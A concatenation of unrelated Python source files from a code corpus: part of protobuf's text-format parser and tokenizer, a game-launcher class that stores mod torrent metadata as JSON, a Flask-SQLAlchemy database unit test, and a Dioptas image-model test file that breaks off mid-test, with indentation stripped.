field = None
else:
raise tokenizer.ParseErrorPreviousToken(
'Extension "%s" not registered. '
'Did you import the _pb2 module which defines it? '
'If you are trying to place the extension in the MessageSet '
'field of another message that is in an Any or MessageSet field, '
'that message\'s _pb2 module must be imported as well' % name)
elif message_descriptor != field.containing_type:
raise tokenizer.ParseErrorPreviousToken(
'Extension "%s" does not extend message type "%s".' %
(name, message_descriptor.full_name))
tokenizer.Consume(']')
else:
name = tokenizer.ConsumeIdentifierOrNumber()
if self.allow_field_number and name.isdigit():
number = ParseInteger(name, True, True)
field = message_descriptor.fields_by_number.get(number, None)
if not field and message_descriptor.is_extendable:
field = message.Extensions._FindExtensionByNumber(number)
else:
field = message_descriptor.fields_by_name.get(name, None)
# Group names are expected to be capitalized as they appear in the
# .proto file, which actually matches their type names, not their field
# names.
if not field:
field = message_descriptor.fields_by_name.get(name.lower(), None)
if field and field.type != descriptor.FieldDescriptor.TYPE_GROUP:
field = None
if (field and field.type == descriptor.FieldDescriptor.TYPE_GROUP and
field.message_type.name != name):
field = None
if not field:
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" has no field named "%s".' %
(message_descriptor.full_name, name))
if field:
if not self._allow_multiple_scalars and field.containing_oneof:
# Check if there's a different field set in this oneof.
# Note that we ignore the case if the same field was set before, and we
# apply _allow_multiple_scalars to non-scalar fields as well.
which_oneof = message.WhichOneof(field.containing_oneof.name)
if which_oneof is not None and which_oneof != field.name:
raise tokenizer.ParseErrorPreviousToken(
'Field "%s" is specified along with field "%s", another member '
'of oneof "%s" for message type "%s".' %
(field.name, which_oneof, field.containing_oneof.name,
message_descriptor.full_name))
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
tokenizer.TryConsume(':')
merger = self._MergeMessageField
else:
tokenizer.Consume(':')
merger = self._MergeScalarField
if (field.label == descriptor.FieldDescriptor.LABEL_REPEATED and
tokenizer.TryConsume('[')):
# Short repeated format, e.g. "foo: [1, 2, 3]"
while True:
merger(tokenizer, message, field)
if tokenizer.TryConsume(']'):
break
tokenizer.Consume(',')
else:
merger(tokenizer, message, field)
else: # Proto field is unknown.
assert self.allow_unknown_extension
_SkipFieldContents(tokenizer)
# For historical reasons, fields may optionally be separated by commas or
# semicolons.
if not tokenizer.TryConsume(','):
tokenizer.TryConsume(';')
def _ConsumeAnyTypeUrl(self, tokenizer):
"""Consumes a google.protobuf.Any type URL and returns the type name."""
# Consume "type.googleapis.com/".
prefix = [tokenizer.ConsumeIdentifier()]
tokenizer.Consume('.')
prefix.append(tokenizer.ConsumeIdentifier())
tokenizer.Consume('.')
prefix.append(tokenizer.ConsumeIdentifier())
tokenizer.Consume('/')
# Consume the fully-qualified type name.
name = [tokenizer.ConsumeIdentifier()]
while tokenizer.TryConsume('.'):
name.append(tokenizer.ConsumeIdentifier())
return '.'.join(prefix), '.'.join(name)
def _MergeMessageField(self, tokenizer, message, field):
"""Merges a single scalar field into a message.
Args:
tokenizer: A tokenizer to parse the field value.
message: The message of which field is a member.
field: The descriptor of the field to be merged.
Raises:
ParseError: In case of text parsing problems.
"""
is_map_entry = _IsMapEntry(field)
if tokenizer.TryConsume('<'):
end_token = '>'
else:
tokenizer.Consume('{')
end_token = '}'
if (field.message_type.full_name == _ANY_FULL_TYPE_NAME and
tokenizer.TryConsume('[')):
type_url_prefix, packed_type_name = self._ConsumeAnyTypeUrl(tokenizer)
tokenizer.Consume(']')
tokenizer.TryConsume(':')
if tokenizer.TryConsume('<'):
expanded_any_end_token = '>'
else:
tokenizer.Consume('{')
expanded_any_end_token = '}'
expanded_any_sub_message = _BuildMessageFromTypeName(packed_type_name,
self.descriptor_pool)
if not expanded_any_sub_message:
raise ParseError('Type %s not found in descriptor pool' %
packed_type_name)
while not tokenizer.TryConsume(expanded_any_end_token):
if tokenizer.AtEnd():
raise tokenizer.ParseErrorPreviousToken('Expected "%s".' %
(expanded_any_end_token,))
self._MergeField(tokenizer, expanded_any_sub_message)
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
any_message = getattr(message, field.name).add()
else:
any_message = getattr(message, field.name)
any_message.Pack(expanded_any_sub_message,
type_url_prefix=type_url_prefix)
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
if field.is_extension:
sub_message = message.Extensions[field].add()
elif is_map_entry:
sub_message = getattr(message, field.name).GetEntryClass()()
else:
sub_message = getattr(message, field.name).add()
else:
if field.is_extension:
sub_message = message.Extensions[field]
else:
sub_message = getattr(message, field.name)
sub_message.SetInParent()
while not tokenizer.TryConsume(end_token):
if tokenizer.AtEnd():
raise tokenizer.ParseErrorPreviousToken('Expected "%s".' % (end_token,))
self._MergeField(tokenizer, sub_message)
if is_map_entry:
value_cpptype = field.message_type.fields_by_name['value'].cpp_type
if value_cpptype == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
value = getattr(message, field.name)[sub_message.key]
value.MergeFrom(sub_message.value)
else:
getattr(message, field.name)[sub_message.key] = sub_message.value
@staticmethod
def _IsProto3Syntax(message):
message_descriptor = message.DESCRIPTOR
return (hasattr(message_descriptor, 'syntax') and
message_descriptor.syntax == 'proto3')
def _MergeScalarField(self, tokenizer, message, field):
"""Merges a single scalar field into a message.
Args:
tokenizer: A tokenizer to parse the field value.
message: A protocol message to record the data.
field: The descriptor of the field to be merged.
Raises:
ParseError: In case of text parsing problems.
RuntimeError: On runtime errors.
"""
_ = self.allow_unknown_extension
value = None
if field.type in (descriptor.FieldDescriptor.TYPE_INT32,
descriptor.FieldDescriptor.TYPE_SINT32,
descriptor.FieldDescriptor.TYPE_SFIXED32):
value = _ConsumeInt32(tokenizer)
elif field.type in (descriptor.FieldDescriptor.TYPE_INT64,
descriptor.FieldDescriptor.TYPE_SINT64,
descriptor.FieldDescriptor.TYPE_SFIXED64):
value = _ConsumeInt64(tokenizer)
elif field.type in (descriptor.FieldDescriptor.TYPE_UINT32,
descriptor.FieldDescriptor.TYPE_FIXED32):
value = _ConsumeUint32(tokenizer)
elif field.type in (descriptor.FieldDescriptor.TYPE_UINT64,
descriptor.FieldDescriptor.TYPE_FIXED64):
value = _ConsumeUint64(tokenizer)
elif field.type in (descriptor.FieldDescriptor.TYPE_FLOAT,
descriptor.FieldDescriptor.TYPE_DOUBLE):
value = tokenizer.ConsumeFloat()
elif field.type == descriptor.FieldDescriptor.TYPE_BOOL:
value = tokenizer.ConsumeBool()
elif field.type == descriptor.FieldDescriptor.TYPE_STRING:
value = tokenizer.ConsumeString()
elif field.type == descriptor.FieldDescriptor.TYPE_BYTES:
value = tokenizer.ConsumeByteString()
elif field.type == descriptor.FieldDescriptor.TYPE_ENUM:
value = tokenizer.ConsumeEnum(field)
else:
raise RuntimeError('Unknown field type %d' % field.type)
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
if field.is_extension:
message.Extensions[field].append(value)
else:
getattr(message, field.name).append(value)
else:
# Proto3 doesn't represent presence so we can't test if multiple scalars
# have occurred. We have to allow them.
can_check_presence = not self._IsProto3Syntax(message)
if field.is_extension:
if (not self._allow_multiple_scalars and can_check_presence and
message.HasExtension(field)):
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" should not have multiple "%s" extensions.' %
(message.DESCRIPTOR.full_name, field.full_name))
else:
message.Extensions[field] = value
else:
if (not self._allow_multiple_scalars and can_check_presence and
message.HasField(field.name)):
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" should not have multiple "%s" fields.' %
(message.DESCRIPTOR.full_name, field.name))
else:
setattr(message, field.name, value)
def _SkipFieldContents(tokenizer):
"""Skips over contents (value or message) of a field.
Args:
tokenizer: A tokenizer to parse the field name and values.
"""
# Try to guess the type of this field.
# If this field is not a message, there should be a ":" between the
# field name and the field value and also the field value should not
# start with "{" or "<" which indicates the beginning of a message body.
# If there is no ":" or there is a "{" or "<" after ":", this field has
# to be a message or the input is ill-formed.
if tokenizer.TryConsume(':') and not tokenizer.LookingAt(
'{') and not tokenizer.LookingAt('<'):
_SkipFieldValue(tokenizer)
else:
_SkipFieldMessage(tokenizer)
def _SkipField(tokenizer):
"""Skips over a complete field (name and value/message).
Args:
tokenizer: A tokenizer to parse the field name and values.
"""
if tokenizer.TryConsume('['):
# Consume extension name.
tokenizer.ConsumeIdentifier()
while tokenizer.TryConsume('.'):
tokenizer.ConsumeIdentifier()
tokenizer.Consume(']')
else:
tokenizer.ConsumeIdentifier()
_SkipFieldContents(tokenizer)
# For historical reasons, fields may optionally be separated by commas or
# semicolons.
if not tokenizer.TryConsume(','):
tokenizer.TryConsume(';')
def _SkipFieldMessage(tokenizer):
"""Skips over a field message.
Args:
tokenizer: A tokenizer to parse the field name and values.
"""
if tokenizer.TryConsume('<'):
delimiter = '>'
else:
tokenizer.Consume('{')
delimiter = '}'
while not tokenizer.LookingAt('>') and not tokenizer.LookingAt('}'):
_SkipField(tokenizer)
tokenizer.Consume(delimiter)
def _SkipFieldValue(tokenizer):
"""Skips over a field value.
Args:
tokenizer: A tokenizer to parse the field name and values.
Raises:
ParseError: In case an invalid field value is found.
"""
# String/bytes tokens can come in multiple adjacent string literals.
# If we can consume one, consume as many as we can.
if tokenizer.TryConsumeByteString():
while tokenizer.TryConsumeByteString():
pass
return
if (not tokenizer.TryConsumeIdentifier() and
not _TryConsumeInt64(tokenizer) and not _TryConsumeUint64(tokenizer) and
not tokenizer.TryConsumeFloat()):
raise ParseError('Invalid field value: ' + tokenizer.token)
class Tokenizer(object):
"""Protocol buffer text representation tokenizer.
This class handles the lower level string parsing by splitting it into
meaningful tokens.
It was directly ported from the Java protocol buffer API.
"""
_WHITESPACE = re.compile(r'\s+')
_COMMENT = re.compile(r'(\s*#.*$)', re.MULTILINE)
_WHITESPACE_OR_COMMENT = re.compile(r'(\s|(#.*$))+', re.MULTILINE)
_TOKEN = re.compile('|'.join([
r'[a-zA-Z_][0-9a-zA-Z_+-]*', # an identifier
r'([0-9+-]|(\.[0-9]))[0-9a-zA-Z_.+-]*', # a number
] + [ # quoted str for each quote mark
r'{qt}([^{qt}\n\\]|\\.)*({qt}|\\?$)'.format(qt=mark) for mark in _QUOTES
]))
_IDENTIFIER = re.compile(r'[^\d\W]\w*')
_IDENTIFIER_OR_NUMBER = re.compile(r'\w+')
def __init__(self, lines, skip_comments=True):
self._position = 0
self._line = -1
self._column = 0
self._token_start = None
self.token = ''
self._lines = iter(lines)
self._current_line = ''
self._previous_line = 0
self._previous_column = 0
self._more_lines = True
self._skip_comments = skip_comments
self._whitespace_pattern = (skip_comments and self._WHITESPACE_OR_COMMENT
or self._WHITESPACE)
self._SkipWhitespace()
self.NextToken()
def LookingAt(self, token):
return self.token == token
def AtEnd(self):
"""Checks the end of the text was reached.
Returns:
True iff the end was reached.
"""
return not self.token
def _PopLine(self):
while len(self._current_line) <= self._column:
try:
self._current_line = next(self._lines)
except StopIteration:
self._current_line = ''
self._more_lines = False
return
else:
self._line += 1
self._column = 0
def _SkipWhitespace(self):
while True:
self._PopLine()
match = self._whitespace_pattern.match(self._current_line, self._column)
if not match:
break
length = len(match.group(0))
self._column += length
def TryConsume(self, token):
"""Tries to consume a given piece of text.
Args:
token: Text to consume.
Returns:
True iff the text was consumed.
"""
if self.token == token:
self.NextToken()
return True
return False
def Consume(self, token):
"""Consumes a piece of text.
Args:
token: Text to consume.
Raises:
ParseError: If the text couldn't be consumed.
"""
if not self.TryConsume(token):
raise self.ParseError('Expected "%s".' % token)
def ConsumeComment(self):
result = self.token
if not self._COMMENT.match(result):
raise self.ParseError('Expected comment.')
self.NextToken()
return result
def ConsumeCommentOrTrailingComment(self):
"""Consumes a comment, returns a 2-tuple (trailing bool, comment str)."""
# Tokenizer initializes _previous_line and _previous_column to 0. As the
# tokenizer starts, it looks like there is a previous token on the line.
just_started = self._line == 0 and self._column == 0
before_parsing = self._previous_line
comment = self.ConsumeComment()
    # A trailing comment is a comment on the same line as the previous token.
trailing = (self._previous_line == before_parsing
and not just_started)
return trailing, comment
def TryConsumeIdentifier(self):
try:
self.ConsumeIdentifier()
return True
except ParseError:
return False
def ConsumeIdentifier(self):
"""Consumes protocol message field identifier.
Returns:
Identifier string.
Raises:
ParseError: If an identifier couldn't be consumed.
"""
result = self.token
if not self._IDENTIFIER.match(result):
raise self.ParseError('Expected identifier.')
self.NextToken()
return result
def TryConsumeIdentifierOrNumber(self):
try:
self.ConsumeIdentifierOrNumber()
return True
except ParseError:
return False
def ConsumeIdentifierOrNumber(self):
"""Consumes protocol message field identifier.
Returns:
Identifier string.
Raises:
ParseError: If an identifier couldn't be consumed.
"""
result = self.token
if not self._IDENTIFIER_OR_NUMBER.match(result):
raise self.ParseError('Expected identifier or number, got %s.' % result)
self.NextToken()
return result
def TryConsumeInteger(self):
try:
# Note: is_long only affects value type, not whether an error is raised.
self.ConsumeInteger()
return True
except ParseError:
return False
def ConsumeInteger(self, is_long=False):
"""Consumes an integer number.
Args:
is_long: True if the value should be returned as a long integer.
Returns:
The integer parsed.
Raises:
ParseError: If an integer couldn't be consumed.
"""
try:
result = _ParseAbstractInteger(self.token, is_long=is_long)
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def TryConsumeFloat(self):
try:
self.ConsumeFloat()
return True
except ParseError:
return False
def ConsumeFloat(self):
"""Consumes an floating point number.
Returns:
The number parsed.
Raises:
ParseError: If a floating point number couldn't be consumed.
"""
try:
result = ParseFloat(self.token)
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def ConsumeBool(self):
"""Consumes a boolean value.
Returns:
The bool parsed.
Raises:
ParseError: If a boolean value couldn't be consumed.
"""
try:
result = ParseBool(self.token)
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def TryConsumeByteString(self):
try:
self.ConsumeByteString()
return True
except ParseError:
return False
def ConsumeString(self):
"""Consumes a string value.
Returns:
The string parsed.
Raises:
ParseError: If a string value couldn't be consumed.
"""
the_bytes = self.ConsumeByteString()
try:
return six.text_type(the_bytes, 'utf-8')
except UnicodeDecodeError as e:
raise self._StringParseError(e)
def ConsumeByteString(self):
"""Consumes a byte array value.
Returns:
The array parsed (as a string).
Raises:
ParseError: If a byte array value couldn't be consumed.
"""
the_list = [self._ConsumeSingleByteString()]
while self.token and self.token[0] in _QUOTES:
the_list.append(self._ConsumeSingleByteString())
return b''.join(the_list)
def _ConsumeSingleByteString(self):
"""Consume one token of a string literal.
String literals (whether bytes or text) can come in multiple adjacent
tokens which are automatically concatenated, like in C or Python. This
method only consumes one token.
Returns:
The token parsed.
Raises:
ParseError: When the wrong format data is found.
"""
text = self.token
if len(text) < 1 or text[0] not in _QUOTES:
raise self.ParseError('Expected string but found: %r' % (text,))
if len(text) < 2 or text[-1] != text[0]:
raise self.ParseError('String missing ending quote: %r' % (text,))
try:
result = text_encoding.CUnescape(text[1:-1])
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def ConsumeEnum(self, field):
try:
result = ParseEnum(field, self.token)
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def ParseErrorPreviousToken(self, message):
"""Creates and *returns* a ParseError for the previously read token.
Args:
message: A message to set for the exception.
Returns:
A ParseError instance.
"""
return ParseError(message, self._previous_line + 1,
self._previous_column + 1)
def ParseError(self, message):
"""Creates and *returns* a ParseError for the current token."""
return ParseError(message, self._line + 1, self._column + 1)
def _StringParseError(self, e):
return self.ParseError('Couldn\'t parse string: ' + str(e))
def NextToken(self):
"""Reads the next meaningful token."""
self._previous_line = self._line
self._previous_column = self._column
self._column += len(self.token)
self._SkipWhitespace()
if not self._more_lines:
self.token = ''
return
match = self._TOKEN.match(self._current_line, self._column)
if not match and not self._skip_comments:
match = self._COMMENT.match(self._current_line, self._column)
if match:
token = match.group(0)
self.token = token
else:
self.token = self._current_line[self._column]
# Aliased so it can still be accessed by current visibility violators.
# TODO(dbarnett): Migrate violators to textformat_tokenizer.
_Tokenizer = Tokenizer # pylint: disable=invalid-name
def _ConsumeInt32(tokenizer):
"""Consumes a signed 32bit integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
Returns:
The integer parsed.
Raises:
ParseError: If a signed 32bit integer couldn't be consumed.
"""
return _ConsumeInteger(tokenizer, is_signed=True, is_long=False)
def _ConsumeUint32(tokenizer):
"""Consumes an unsigned 32bit integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
Returns:
The integer parsed.
Raises:
ParseError: If an unsigned 32bit integer couldn't be consumed.
"""
return _ConsumeInteger(tokenizer, is_signed=False, is_long=False)
def _TryConsumeInt64(tokenizer):
try:
_ConsumeInt64(tokenizer)
return True
except ParseError:
return False
def _ConsumeInt64(tokenizer):
"""Consumes a signed 32bit integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
Returns:
The integer parsed.
Raises:
    ParseError: If a signed 64bit integer couldn't be consumed.
"""
return _ConsumeInteger(tokenizer, is_signed=True, is_long=True)
def _TryConsumeUint64(tokenizer):
try:
_ConsumeUint64(tokenizer)
return True
except ParseError:
return False
def _ConsumeUint64(tokenizer):
"""Consumes an unsigned 64bit integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
Returns:
The integer parsed.
Raises:
ParseError: If an unsigned 64bit integer couldn't be consumed.
"""
return _ConsumeInteger(tokenizer, is_signed=False, is_long=True)
def _TryConsumeInteger(tokenizer, is_signed=False, is_long=False):
try:
_ConsumeInteger(tokenizer, is_signed=is_signed, is_long=is_long)
return True
except ParseError:
return False
def _ConsumeInteger(tokenizer, is_signed=False, is_long=False):
"""Consumes an integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
is_signed: True if a signed integer must be parsed.
is_long: True if a long integer must be parsed.
Returns:
The integer parsed.
Raises:
ParseError: If an integer with given characteristics couldn't be consumed.
"""
try:
result = ParseInteger(tokenizer.token, is_signed=is_signed, is_long=is_long)
except ValueError as e:
raise tokenizer.ParseError(str(e))
tokenizer.NextToken()
return result
def ParseInteger(text, is_signed=False, is_long=False):
"""Parses an integer.
Args:
text: The text to parse.
is_signed: True if a signed integer must be parsed.
is_long: True if a long integer must be parsed.
Returns:
The integer value.
Raises:
ValueError: Thrown Iff the text is not a valid integer.
"""
# Do the actual parsing. Exception handling is propagated to caller.
result = _ParseAbstractInteger(text, is_long=is_long)
# Check if the integer is sane. Exceptions handled by callers.
checker = _INTEGER_CHECKERS[2 * int(is_long) + int(is_signed)]
checker.CheckValue(result)
return result
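# Illustrative examples of ParseInteger (kept as comments so that importing this
# module is unaffected; results follow from the base-0 parsing done in
# _ParseAbstractInteger below and the range checks in _INTEGER_CHECKERS):
#   ParseInteger('42')                  -> 42
#   ParseInteger('0x2A')                -> 42   (hex accepted because base 0 is used)
#   ParseInteger('-7', is_signed=True)  -> -7
#   ParseInteger('-7')                  -> raises an error (outside the unsigned range)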
def _ParseAbstractInteger(text, is_long=False):
"""Parses an integer without checking size/signedness.
Args:
text: The text to parse.
is_long: True if the value should be returned as a long integer.
Returns:
The integer value.
Raises:
ValueError: Thrown Iff the text is not a valid integer.
"""
# Do the actual parsing. Exception handling is propagated to caller.
try:
# We force 32-bit values to int and 64-bit values to long to make
# alternate implementations where the distinction is more significant
# (e.g. the C++ implementation) simpler.
if is_long:
return long(text, 0)
else:
return int(text, 0)
except ValueError:
raise ValueError('Couldn\'t parse integer: %s' % text)
def ParseFloat(text):
"""Parse a floating point number.
Args:
text: Text to parse.
Returns:
The number parsed.
Raises:
ValueError: If a floating point number couldn't be parsed.
"""
try:
# Assume Python compatible syntax.
return float(text)
except ValueError:
# Check alternative spellings.
if _FLOAT_INFINITY.match(text):
if text[0] == '-':
return float('-inf')
else:
return float('inf')
elif _FLOAT_NAN.match(text):
return float('nan')
else:
# assume '1.0f' format
try:
return float(text.rstrip('f'))
except ValueError:
raise ValueError('Couldn\'t parse float: %s' % text)
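# Illustrative examples of the alternative float spellings handled above (kept as
# comments to avoid executing anything at import time; _FLOAT_INFINITY and
# _FLOAT_NAN are the regexes defined earlier in this module):
#   ParseFloat('1.5')   -> 1.5
#   ParseFloat('1.0f')  -> 1.0    (trailing 'f' stripped as a fallback)
#   ParseFloat('-inf')  -> float('-inf')
#   ParseFloat('nan')   -> float('nan')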
def ParseBool(text):
"""Parse a boolean value.
Args:
text: Text to parse.
Returns:
    The boolean value parsed.
Raises:
ValueError: If text is not a valid boolean.
"""
if text in ('true', 't', '1', 'True'):
return True
elif text in ('false', 'f', '0', 'False'):
return False
else:
raise ValueError('Expected "true" or "false".')
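# Illustrative ParseBool behaviour (comments only; the accepted spellings are
# exactly the ones listed in the two tuples above):
#   ParseBool('true')  -> True     ParseBool('1') -> True
#   ParseBool('False') -> False    ParseBool('f') -> False
#   ParseBool('yes')   -> raises ValueError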
def ParseEnum(field, value):
"""Parse an enum value.
The value can be specified by a number (the enum value), or by
a string literal (the enum name).
Args:
field: Enum field descriptor.
value: String value.
Returns:
Enum value number.
Raises:
ValueError: If the enum value could not be parsed.
"""
enum_descriptor = field.enum_type
try:
number = int(value, 0)
except ValueError:
# Identifier.
enum_value = enum_descriptor.values_by_name.get(value, None)
if enum_value is None:
raise ValueError('Enum type "%s" has no value named %s.' %
(enum_descriptor.full_name, value))
else:
# Numeric value.
enum_value = enum_descriptor.values_by_number.get(number, None)
if enum_value is None:
raise ValueError('Enum type "%s" has no value with number %d.' %
(enum_descriptor.full_name, number))
return enum_value.number
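# Hedged usage sketch for ParseEnum (comments only, since it needs a real enum
# field descriptor; 'SomeMessage' and its 'kind' field are hypothetical names):
#   field = SomeMessage.DESCRIPTOR.fields_by_name['kind']
#   ParseEnum(field, 'KIND_B')  -> the number registered for the KIND_B value
#   ParseEnum(field, '2')       -> 2, provided some enum value with number 2 exists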
| spxtr/bazel | third_party/protobuf/3.4.0/python/google/protobuf/text_format.py | Python | apache-2.0 | 50,504 |
# Bulletproof Arma Launcher
# Copyright (C) 2016 Lukasz Taczuk
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from __future__ import unicode_literals
import base64
import errno
import json
import os
from kivy import Logger
from utils.paths import get_launcher_directory
class MetadataFile(object):
"""File that contains metadata about mods and is located in the root directory of each mod"""
"""TODO: Maybe screw the whole json part and just bencode everything?"""
file_extension = '.launcher_meta'
file_directory = 'mods_metadata'
_encoding = 'utf-8'
def __init__(self, mod_name):
super(MetadataFile, self).__init__()
file_name = '{}{}'.format(mod_name, self.file_extension)
self.file_path = os.path.join(get_launcher_directory(), self.file_directory, file_name)
self.data = {}
def get_file_name(self):
"""Returns the full path to the metadata file"""
return self.file_path
def read_data(self, ignore_open_errors=False):
"""Open the file and read its data to an internal variable
If ignore_open_errors is set to True, it will ignore errors while opening the file
(which may not exist along with the whole directory if the torrent is downloaded for the first time)"""
self.data = {}
try:
with open(self.get_file_name(), 'rb') as file_handle:
self.data = json.load(file_handle, encoding=MetadataFile._encoding)
except (IOError, ValueError):
if ignore_open_errors:
pass
else:
raise
def _create_missing_directories(self, dirpath):
"""Creates missing directories. Does not raise exceptions if the path already exists
Maybe move this to utils module in the future"""
try:
os.makedirs(dirpath)
except OSError as exc:
if exc.errno != errno.EEXIST or not os.path.isdir(dirpath):
raise
def write_data(self):
"""Open the file and write the contents of the internal data variable to the file"""
self._create_missing_directories(os.path.dirname(self.get_file_name()))
json_string = json.dumps(self.data, encoding=MetadataFile._encoding, indent=2)
with open(self.get_file_name(), 'wb') as file_handle:
file_handle.write(json_string)
def set_base64_key(self, key_name, value):
self.data[key_name] = base64.b64encode(value)
def get_base64_key(self, key_name):
data = self.data.setdefault(key_name, None)
if data:
try:
data = base64.b64decode(data)
except TypeError:
data = None
return data
# Accessors and mutators below
def set_torrent_url(self, url):
self.data['torrent_url'] = url
def get_torrent_url(self):
return self.data.setdefault('torrent_url', '')
def set_torrent_resume_data(self, data):
self.set_base64_key('torrent_resume_data', data)
def get_torrent_resume_data(self):
return self.get_base64_key('torrent_resume_data')
def set_torrent_content(self, torrent_content):
self.set_base64_key('torrent_content', torrent_content)
def get_torrent_content(self):
return self.get_base64_key('torrent_content')
def set_dirty(self, is_dirty):
"""Mark the torrent as dirty - in an inconsistent state (download started, we don't know what's exactly on disk)"""
self.data['dirty'] = bool(is_dirty)
Logger.info('set_dirty: Mod {}: {}'.format(self.get_file_name(), is_dirty))
def get_dirty(self):
return self.data.setdefault('dirty', False)
def set_force_creator_complete(self, complete):
self.data['force_creator_complete'] = complete
def get_force_creator_complete(self):
return self.data.setdefault('force_creator_complete', False)
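# Hedged usage sketch (not part of the original module): a typical
# read-modify-write cycle around a torrent download. 'example_mod' and the URL
# are made-up values, and this assumes the launcher directory is writable.
#
#   metadata = MetadataFile('example_mod')
#   metadata.read_data(ignore_open_errors=True)   # the file may not exist yet
#   metadata.set_torrent_url('http://example.com/example_mod.torrent')
#   metadata.set_dirty(True)                       # download is about to start
#   metadata.write_data()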
| overfl0/Bulletproof-Arma-Launcher | src/utils/metadatafile.py | Python | gpl-3.0 | 4,301 |
from flask.ext.testing import TestCase
from sample_application.app import create_app
from sample_application.models import db, FavoriteColor
class TestDatabase(TestCase):
"""
Test flask-sqlalchemy database operations
"""
def create_app(self):
"""
Called once at the beginning of the tests; must return the application
instance
:return: flask.Flask application instance
"""
_app = create_app()
# Override whatever database uri is in the config for tests;
# Use an in-memory sqlite database to ensure that no production data
# are touched
_app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///"
return _app
def setUp(self):
"""
setUp and tearDown are run at the start of each test; ensure
that a fresh database is used for each test.
"""
db.create_all()
def tearDown(self):
"""
setUp and tearDown are run at the start of each test; ensure
that a fresh database is used for each test.
"""
db.session.remove()
db.drop_all()
def test_add_entry(self):
"""
        Ensure that adding and retrieving data from the database works
"""
c = FavoriteColor(
username='unittest',
color='red'
)
db.session.add(c)
db.session.commit()
rv = FavoriteColor.query.filter_by(username='unittest').first()
self.assertEqual(rv.username,'unittest')
self.assertEqual(rv.color, 'red') | jonnybazookatone/adsabs-webservices-blueprint | sample_application/tests/unittests/test_database.py | Python | mit | 1,557 |
# -*- coding: utf-8 -*-
# Dioptas - GUI program for fast processing of 2D X-ray diffraction data
# Principal author: Clemens Prescher ([email protected])
# Copyright (C) 2014-2019 GSECARS, University of Chicago, USA
# Copyright (C) 2015-2018 Institute for Geology and Mineralogy, University of Cologne, Germany
# Copyright (C) 2019 DESY, Hamburg, Germany
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from mock import MagicMock
import os
import numpy as np
from ..utility import QtTest
from ...model.ImgModel import ImgModel, BackgroundDimensionWrongException
from ...model.util.ImgCorrection import DummyCorrection
unittest_path = os.path.dirname(__file__)
data_path = os.path.join(unittest_path, '../data')
spe_path = os.path.join(data_path, 'spe')
class ImgModelTest(QtTest):
def setUp(self):
self.img_model = ImgModel()
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
def tearDown(self):
del self.img_model
def test_load_karabo_nexus_file(self):
self.img_model.load(os.path.join(data_path, 'karabo_epix.h5'))
def perform_transformations_tests(self):
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.rotate_img_m90()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.flip_img_horizontally()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.rotate_img_p90()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.flip_img_vertically()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
self.img_model.reset_transformations()
self.assertEqual(np.sum(np.absolute(self.img_model.img_data)), 0)
def test_load_emits_signal(self):
callback_fcn = MagicMock()
self.img_model.img_changed.connect(callback_fcn)
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
callback_fcn.assert_called_once_with()
def test_flipping_images(self):
original_image = np.copy(self.img_model._img_data)
self.img_model.flip_img_vertically()
self.assertTrue(np.array_equal(self.img_model._img_data, np.flipud(original_image)))
def test_simple_background_subtraction(self):
self.first_image = np.copy(self.img_model.img_data)
self.img_model.load_next_file()
self.second_image = np.copy(self.img_model.img_data)
self.img_model.load(os.path.join(data_path, 'image_001.tif'))
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
self.assertFalse(np.array_equal(self.first_image, self.img_model.img_data))
self.img_model.load_next_file()
self.assertEqual(np.sum(self.img_model.img_data), 0)
def test_background_subtraction_with_supersampling(self):
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
self.img_model.set_supersampling(2)
self.img_model.set_supersampling(3)
self.img_model.load_next_file()
def test_background_subtraction_with_transformation(self):
self.img_model.load_background(os.path.join(data_path, 'image_002.tif'))
original_img = np.copy(self.img_model._img_data)
original_background = np.copy(self.img_model._background_data)
self.assertIsNotNone(self.img_model._background_data)
self.assertFalse(np.array_equal(self.img_model.img_data, self.img_model._img_data))
original_img_background_subtracted = np.copy(self.img_model.img_data)
self.assertTrue(np.array_equal(original_img_background_subtracted, original_img - original_background))
### now comes the main process - flipping the image
self.img_model.flip_img_vertically()
flipped_img = np.copy(self.img_model._img_data)
self.assertTrue(np.array_equal(np.flipud(original_img), flipped_img))
flipped_background = np.copy(self.img_model._background_data)
